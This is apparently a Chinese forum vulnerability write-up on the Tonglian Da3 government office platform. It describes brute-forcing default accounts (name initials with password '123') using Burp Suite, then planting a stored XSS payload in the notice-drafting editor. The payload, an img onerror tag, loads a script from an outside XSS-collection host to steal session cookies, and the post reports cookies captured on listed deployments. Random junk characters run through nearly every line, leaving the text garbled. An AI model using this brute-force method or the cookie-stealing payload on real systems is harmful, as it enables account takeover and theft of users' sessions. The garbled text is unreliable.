+ z& ]3 f9 H, j) ~
+ w- B- j7 j+ h( n& ]2 I 同联Da3协同办公平台后台通用储存型xss漏洞
& {; X4 Z8 t( W @. a+ C8 \2 O
% s7 N+ K5 `, K W, a0 b R
& J. K5 U1 [& u 平台简介:
5 w$ _3 G& a8 \$ _* t
+ K! u0 p; B- s8 |+ q0 P * P4 u. ~* T' n' a5 Q% s$ E
2 e% ^* P7 z. ~
0 \# o8 T- c$ F; ]
) x9 S' R# a/ p, K$ ? }6 c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 s6 _# F1 q& Q1 [, C同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) ~ I7 R$ n2 ~2 @ M* u7 s' K同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!4 N% A' E7 z* N9 V
% M! U& f6 G! B5 i8 a# _: a
- l! u, [' x y% y1 f5 ]
6 ]$ i- @: b" w8 ]! ?
2 [2 L" @! x ^5 F% g
, ?& u& I3 h5 W* U( w- j 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:- @; U7 w e+ F* }- E/ ?
. n) Z& k' Z" I- U8 D6 N( L 2 m* q/ [% k; C/ j5 K
- K/ Z! [- w0 ^
" N) }" A- a3 {# l. n
8 F, G% \ X8 V ]" q! Y! R
http://1.1.1.1:7197/cap-aco/#(案例2-)' J$ G: X, r+ ^ e- X/ B
) P0 V* j( {& N! b Q. K d
9 L5 q e/ ^' K8 ]/ S3 j7 }' S' x
http://www.XXOO.com (案例1-官网网站)
3 W) x# u) ?1 z* a- S0 t
; S8 {9 ~. i% b' g0 `" `' H
. c" `: X9 ^: k. u8 h' B. m# m
漏洞详情:
2 ?2 W: Y- f9 v0 H1 s' n \
( h, D$ h; _9 r* i, z9 b9 Y) E
6 ~1 J: V& Q( z# W
案例一、' _5 y$ z) g x0 s0 M! R' {
" c; s) {& ?! R7 [2 O
4 w. |% x( Y! x3 Y ]
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试4 M6 L, B" I9 u9 o
y2 n- q2 ?$ {; B 8 U- L! z% J8 y) Q1 T5 Y& A4 C
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
- G2 \" }. g" b) U% E
5 y" \2 q2 N+ Q5 u& G& E
# T/ d% r n F, j
# ^: q/ v, ]6 K% B% C% j" q# m$ U
4 N, D+ G( }! C9 U7 C( y4 ~: p; i 2 w/ R9 N W+ v" y
# h2 {( s, N- t, Z8 |3 n5 K# {
8 |5 ]8 c% p$ k. N) W& }
E& s% L# s( v; w' Q status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: J+ S/ J/ ^% a; T# J/ |2 f
$ }0 J7 t! A2 m, j; E9 s
$ N5 A& e; D# S, ?) Y
% y) ]( F( ?; [1 j+ j) R. Q
0 T" Z0 Z$ E4 j
9 B2 [, m, M, a4 }; [: ~# w
8 e5 {! Q7 Q8 F$ V V; s) P0 U& V
9 I& P' a4 |! V& ^2 @. W % o, z6 R; q' g4 l4 {; D
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 , J0 \, X- U0 d- h. _4 z
1 A2 I3 U6 B( }! C* H2 @3 J9 `
1 Z) t: X" d) _4 u
: z+ m* D% \8 [7 }. Q q+ e
7 v# E- Z8 k- ~/ L) Q7 i( x
7 f7 b" x6 _5 u( f" g <img src=x; |4 W ?/ Z% ]4 y- n
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: & C+ e+ |# O1 |0 h+ F! ]
m" f1 g1 M6 [7 u% Q2 _3 B ' \) }* V2 C$ p; J+ s
$ I- w! p$ K8 L8 U ]+ ^" ]( R
/ l& }8 n) \. @# H
9 J. T8 Q6 p& V; Z% _ 然后发送,接收cookie如图: ; M2 w% j5 H3 ^. F# x
: W6 g0 N$ @/ T7 Z/ U: A $ c3 l7 i% H& {7 n
. G% \0 ?; ~/ C$ U- W
1 g- k: r5 ]5 G% t# K0 m
( j& b8 H5 H4 r& {: a6 g$ T
: n' H) q8 R: D" K; k
# {! X4 i3 p$ p8 F$ Q + r- E5 a& a& H! U! c* W# N
+ {4 E Y3 j# `; ~& t& |/ B) H+ v) L
7 Z8 n% @: q* o! m
. s/ E8 [8 F7 d& \9 q4 F ) _3 P/ P& c, T% R- N
; X% V2 b, ^; ^
, v% G) K8 A+ U. {* C
; N' X( t* f( v9 N2 T6 H6 |
/ t5 K* x3 [% \
6 N; y3 S9 f- d& z C/ G
7 W9 }+ F1 R0 u. t
! h [# q" v8 b9 D F3 h 5 L2 i( G* k( F6 T' k: b) Q
8 [5 r' |6 D0 q
- [. L- g1 B/ O2 B* O' }% F1 v
6 ]" O) l& ?- c4 P) N( X 案例2、
2 q* p# x9 r; d+ X# [0 `) v
3 ]0 d1 M. n% K% c5 n 4 i d! n o7 ^0 ~* q
前面步骤都一样,下面看效果图:
+ ?8 [9 ? l( L& {* i. [
% r5 f/ E: d9 ]: M* B
% r6 ?; W9 m+ D( {3 G
$ O$ m9 G q6 Z, d8 ]# a
- r+ U$ N2 Z6 { ' p- ~7 I2 K' `# e& J; @
. @5 p3 S+ N" l' T
, I1 W! }$ W, R) }
! E* R$ }+ t( z$ F7 M. q! F- k
2 D* s% ?, Q4 Z
, J3 Y" ], s- _+ H+ s) w
: \0 O& }( }& w: l! s0 j6 _. y % n% ~6 o& f2 j. v1 B0 M
: c; U- X9 f; e/ k: d
7 A. b, R; m" J, b- b' ~: O/ c
! }. |2 k+ n- _. J7 u6 N. }- z& n
3 L+ s$ O$ Y, x0 w; T
& M# Y& W* q/ r* p# |' b 0 ^7 ?- O& h7 @, f7 j, B
7 _5 f/ U J! z L, J/ B! W
' W. F7 l2 F' a* V$ v2 b' Y% w( j
, @- l- B" D/ n4 W5 P# @
. m' V6 X( E* B$ R4 w1 g2 l
; D( k7 }+ k! j1 r+ f* t$ U " {* F, G$ C8 U8 e5 L: H9 ~
' k1 d! {: l" K1 H; g" A/ t. V
: Q/ p2 V& C* S, g
# ~3 q6 k. j5 C/ I H! R6 Y% C$ x
+ @+ u4 @4 P) J4 S